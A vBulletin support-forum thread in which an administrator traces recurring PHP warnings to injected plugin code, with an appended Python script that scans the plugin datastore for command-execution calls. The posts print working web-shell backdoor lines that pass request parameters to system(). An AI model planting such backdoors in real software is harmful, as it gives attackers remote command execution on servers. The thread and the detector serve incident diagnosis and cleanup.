Getting error after upgrading to 4.2.4

  • dan325ci
    Senior Member
    • May 2004
    • 153

    Getting error after upgrading to 4.2.4

    I am getting a ton of these error messages after the latest upgrade.


    [08-Mar-2017 08:36:54 UTC] PHP Warning: system(): Cannot execute a blank command in /home/username/public_html/forums/global.php(29) : eval()'d code on line 2


    Over and over it just keeps building up.
    When I put the following in the config.php file the error goes away: define('DISABLE_HOOKS', true);
    So, of course I blamed it on a plug-in, but I then disabled every plug-in manually, and it was still giving this error. The only way to shut it off is to have the Disable Hooks entry in the config.php file.


    Any ideas what to do next?
  • Pogo
    Senior Member
    • May 2001
    • 569

    #2
    It's probably in the datastore table, title pluginlist.
    If you'll find system( there and not in any plugin it most likely means that you are hacked in some way.

    Check the pluginlist.data field with this query:
    SELECT * FROM datastore WHERE data LIKE '%global_start%';

    Then search for global_start in the data field and look at the code in the following lines to find system.

    global_start is the hook where the command is executed in global.php.

    If you think that everything is fine (then it has to be a very weird error...), just edit any plugin and save it to rebuild the datastore.
    this is my sig

    Comment

    • dan325ci
      Senior Member
      • May 2004
      • 153

      #3
      Originally posted by Pogo
      It's probably in the datastore table, title pluginlist.
      If you'll find system( there and not in any plugin it most likely means that you are hacked in some way.

      Check the pluginlist.data field with this query:
      SELECT * FROM datastore WHERE data LIKE '%global_start%';

      Then search for global_start in the data field and look at the code in the following lines to find system.

      global_start is the hook where the command is executed in global.php.

      If you think that everything is fine (then it has to be a very weird error...), just edit any plugin and save it to rebuild the datastore.

      I don't know much about what you said above, but I did execute that command you listed above and searched for system( and found two of them, which I will copy here (I only removed the part which has it, so this isn't the entire output):

      ; system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean(); if (version_compare($vbulletin->versionnumber, '4.0.0', 'lt')) //If VB 3.x { global $vbulletin; $vbo = &$vbulletin->options; //If function doesn't exist already and mod enabled, create substitute function if (!function_exists('http_response_code') AND $vbo['bop5he_en']) { function http_response_code($newcode = NULL) { static $code = 200; if($newcode !== NULL) { header('X-PHP-Response-Code: '.$newcode, true, $newcode); if(!headers_sent()) $code = $newcode; } return $code; } } } ";s:13:"ajax_complete";s:79:"if(isset($_GET['lol'])){echo "<h1>lol</h1><pre>"; system($_GET['lol']);exit;}


      You can see two of them in there somewhere.... now what?

      Thanks

      Comment

      • Pogo
        Senior Member
        • May 2001
        • 569

        #4
        Edit any plugin and save it to rebuild the datastore and thus remove the (perhaps) backdoor code.

        Check again for system:
        SELECT * FROM datastore WHERE data LIKE '%system(%';

        It should return no result now.

        Then check these guides:
        There are four steps to securing your site. If you don't do them all or you do them in the wrong order then you're still susceptible to being attacked again.

        Getting Started This guide is intended to be a starting point for helping to keep your site safe and secure in the long run. It is not a be-all, end-all guide

        This guide is for what to do, after you've been hacked, exploited, and or defaced. Step 1, Change everything: If you believe, or think your site has
        this is my sig

        Comment

        • dan325ci
          Senior Member
          • May 2004
          • 153

          #5
          Originally posted by Pogo
          Edit any plugin and save it to rebuild the datastore and thus remove the (perhaps) backdoor code.

          Check again for system:
          SELECT * FROM datastore WHERE data LIKE '%system(%';

          It should return no result now.

          Then check these guides:
          https://www.vbulletin.com/forum/foru...ring-your-site
          https://www.vbulletin.com/forum/blog...vbulletin-site
          http://www.vbulletin.com/forum/blogs...ve-been-hacked
          Hi

          What do you mean by "edit any plugin and save it to rebuild the datastore" ?

          This only started happening immediately after upgrading our vb to the latest.

          Comment

          • Pogo
            Senior Member
            • May 2001
            • 569

            #6
            Edit was perhaps the wrong word.
            Open a plugin as if you wanted to edit it and just save it.
            That will rebuild the datastore with the code from the plugins.

            Why and how the code was added to the datastore is unknown.
            I guess that you saw the error after the upgrade is either a coincidence or vBulletin was perhaps hiding the warning messages from PHP and the code has been there for a longer time.
            this is my sig

            Comment

            • dan325ci
              Senior Member
              • May 2004
              • 153

              #7
              Originally posted by Pogo
              Edit was perhaps the wrong word.
              Open a plugin as if you wanted to edit it and just save it.
              That will rebuild the datastore with the code from the plugins.

              Why and how the code was added to the datastore is unknown.
              I guess that you saw the error after the upgrade is either a coincidence or vBulletin was perhaps hiding the warning messages from PHP and the code has been there for a longer time.
              OK, thanks. I did click "edit" on all plug-ins that we have and saved each one. Still getting these warnings. If they are warnings, can they just be ignored? I can probably get someone to make a cronjob to delete them as they build up. The forums are still running OK, it's just the error_log files are building up really fast.

              Comment

              • Mark.B
                vBulletin Support
                • Feb 2004
                • 24275
                • 6.0.X

                #8
                So if you manually disable every plugin and product, individually in the admincp product and plugin screens, this error persists?
                MARK.B
                vBulletin Support
                ------------
                My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
                My Unofficial vBulletin Cloud Demo: https://www.adminammo.com

                Comment

                • dan325ci
                  Senior Member
                  • May 2004
                  • 153

                  #9
                  Originally posted by Mark.B
                  So if you manually disable every plugin and product, individually in the admincp product and plugin screens, this error persists?
                  Yes, correct... I went into admincp/plug-ins and manually clicked every plug-in (I have less than 10) and disabled them. I did this thinking it was just one, but I ended up going through the whole list disabling them. Then I checked the error logs and the warnings still keep appearing in the logs, non-stop.

                  Comment

                  • Mark.B
                    vBulletin Support
                    • Feb 2004
                    • 24275
                    • 6.0.X

                    #10
                    Some plugins are a bit fast and loose with honouring being disabled...what plugins do you actually have?
                    MARK.B
                    vBulletin Support
                    ------------
                    My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
                    My Unofficial vBulletin Cloud Demo: https://www.adminammo.com

                    Comment

                    • Paul M
                      Former Lead Developer
                      vB.Com & vB.Org
                      • Sep 2004
                      • 9886

                      #11
                      Turn the plugin system off completely and see what happens.

                      Options > Plugin/Hook System > Enable Plugin/Hook System > No.
                      Baby, I was born this way

                      Comment

                      • Wayne Luke
                        vBulletin Technical Support Lead
                        • Aug 2000
                        • 73438
                        • 6.0.X

                        #12
                        Your site has been hacked and is being exploited. You need to follow the instructions in Securing Your Site. After finishing those steps, if you continue to have problems then open a support ticket using the link in the footer of this page.

                        Translations provided by Google.

                        Wayne Luke
                        The Rabid Badger - a vBulletin Cloud demonstration site.
                        vBulletin 5 API

                        Comment

                        • dan325ci
                          Senior Member
                          • May 2004
                          • 153

                          #13
                          Originally posted by Paul M
                          Turn the plugin system off completely and see what happens.

                          Options > Plugin/Hook System > Enable Plugin/Hook System > No.
                          As I mentioned earlier, disabling plug-ins makes the error go away. However, disabling them one by one in the plug-in sections doesn't make the error disappear.


                          Originally posted by Mark.B
                          Some plugins are a bit fast and loose with honouring being disabled...what plugins do you actually have?
                          The plugins I have are standard ones like Glow Host Spam Detection, IBpro Arcade (latest version), Multiple Detection, Dragon Byte Likes/Activity. But we disabled them one by one and eventually all of them manually and it didn't stop the errors. Only turning off the entire plug-in system worked.

                          Originally posted by Wayne Luke
                          Your site has been hacked and is being exploited. You need to follow the instructions in Securing Your Site. After finishing those steps, if you continue to have problems then open a support ticket using the link in the footer of this page.
                          Wayne: I can't see that happening as we always make sure to have the latest updates and secure our server. I will have a look at that article though.

                          We do have a small snippet here after running a command as suggested above by one of the forum users:

                          "if(isset($_GET['lol'])){echo "<h1>lol</h1><pre>"; system($_GET['lol']);exit;}


                          What is that "lol"?...that looks suspicious. Also, does using the replacement variables manager count as a "plug in" because we use a lot of that with the HTTP to HTTPS move.
                          Last edited by dan325ci; Thu 9 Mar '17, 4:45pm.

                          Comment

                          • Wayne Luke
                            vBulletin Technical Support Lead
                            • Aug 2000
                            • 73438
                            • 6.0.X

                            #14
                            Originally posted by dan325ci
                            Wayne: I can't see that happening as we always make sure to have the latest updates and secure our server. I will have a look at that article though.

                            We do have a small snippet here after running a command as suggested above by one of the forum users:

                            "if(isset($_GET['lol'])){echo "<h1>lol</h1><pre>"; system($_GET['lol']);exit;}


                            What is that "lol"?...that looks suspicious. Also, does using the replacement variables manager count as a "plug in" because we use a lot of that with the HTTP to HTTPS move.
                            Code:
                            SELECT * FROM datastore WHERE data LIKE '%system(%';
                            This query should never return any results. That it did means that your database has been compromised in the past.

                            The code you posted above is an exploit... LOL means Laugh Out Loud. It most likely corresponds with extra PHP files on your server that provide a backdoor into the server itself. This was a very common hack of vBulletin 4.X. Even if you kept up on all the versions of the software, you can still have been hacked. We've closed a number of security related bugs over the years and notify the customers when we release a security patch to fix those bugs. Plus a number of addons have security exploits in them.

                            You can ignore the fact that your site has been hacked or follow the steps outlined in the Securing Your Site topic.


                            Translations provided by Google.

                            Wayne Luke
                            The Rabid Badger - a vBulletin Cloud demonstration site.
                            vBulletin 5 API

                            Comment

                            • dan325ci
                              Senior Member
                              • May 2004
                              • 153

                              #15
                              Originally posted by Wayne Luke

                              Code:
                              SELECT * FROM datastore WHERE data LIKE '%system(%';
                              This query should never return any results. That it did means that your database has been compromised in the past.

                              The code you posted above is an exploit... LOL means Laugh Out Loud. It most likely corresponds with extra PHP files on your server that provide a backdoor into the server itself. This was a very common hack of vBulletin 4.X. Even if you kept up on all the versions of the software, you can still have been hacked. We've closed a number of security related bugs over the years and notify the customers when we release a security patch to fix those bugs. Plus a number of addons have security exploits in them.

                              You can ignore the fact that your site has been hacked or follow the steps outlined in the Securing Your Site topic.

                              Yes, the database was compromised a long time ago with that Arcade hack.

                              OK, you're probably right on that, so the LOL is an exploit. Over the years (I am talking dozens of updates) we always put the new files in but we may have never taken unnecessary ones out, so that could be it. I will double check all the files and make sure to get rid of any .php files that are no longer necessary. The only unusual thing to all this is that these warning errors only started at the 4.2.4 update. Did not have them prior.

                              Comment
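
Added example, not part of the thread and not vBulletin code: a Python check that does the manual search described in posts #2 and #4 per hook, so each command-execution call is reported with the hook it sits in. It assumes the pluginlist datastore value is a PHP-serialized array mapping hook name to plugin code, as the `s:13:"ajax_complete";s:79:"..."` fragment in post #3 suggests; the function names and the sample blob are constructed for illustration.

```python
import re

# PHP functions that run OS commands. Plugin code that reaches one of these,
# especially with request input, is the pattern posted in the thread.
EXEC_CALL = re.compile(rb"\b(system|exec|passthru|shell_exec|popen|proc_open)\s*\(")
REQUEST_INPUT = re.compile(rb"\$_(GET|POST|REQUEST|COOKIE)\b")
PHP_STRING = re.compile(rb's:(\d+):"')


def read_string(buf, pos):
    """Read one PHP-serialized string  s:<byte length>:"<bytes>";  at pos."""
    m = PHP_STRING.match(buf, pos)
    if not m:
        raise ValueError(f"expected serialized string at offset {pos}")
    end = m.end() + int(m.group(1))
    if buf[end:end + 2] != b'";':
        raise ValueError(f"length mismatch at offset {pos}")
    return buf[m.end():end], end + 2


def parse_pluginlist(blob):
    """Parse a:<n>:{s:..;s:..;...} into {hook name: plugin code as bytes}."""
    m = re.match(rb"a:(\d+):\{", blob)
    if not m:
        raise ValueError("not a serialized array")
    pos, hooks = m.end(), {}
    for _ in range(int(m.group(1))):
        name, pos = read_string(blob, pos)
        code, pos = read_string(blob, pos)
        hooks[name.decode()] = code
    return hooks


def suspicious_hooks(blob):
    """Return [(hook, function, uses_request_input)] for command-exec calls."""
    findings = []
    for hook, code in parse_pluginlist(blob).items():
        for call in EXEC_CALL.finditer(code):
            findings.append((hook, call.group(1).decode(),
                             bool(REQUEST_INPUT.search(code))))
    return findings


def php_s(text):
    """Serialize bytes the way PHP does, for building the constructed sample."""
    return b's:%d:"%s";' % (len(text), text)

# Constructed sample: one harmless hook plus the ajax_complete entry quoted in the thread.
SAMPLE = (b"a:2:{" + php_s(b"global_start") + php_s(b"$show['x'] = true;")
          + php_s(b"ajax_complete")
          + php_s(b"if(isset($_GET['lol'])){echo \"<h1>lol</h1><pre>\"; system($_GET['lol']);exit;}")
          + b"}")
```

Run `suspicious_hooks()` on the exported `data` value both before and after re-saving a plugin: an entry that is still reported after the rebuild is coming from a stored plugin rather than from the cached datastore alone.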
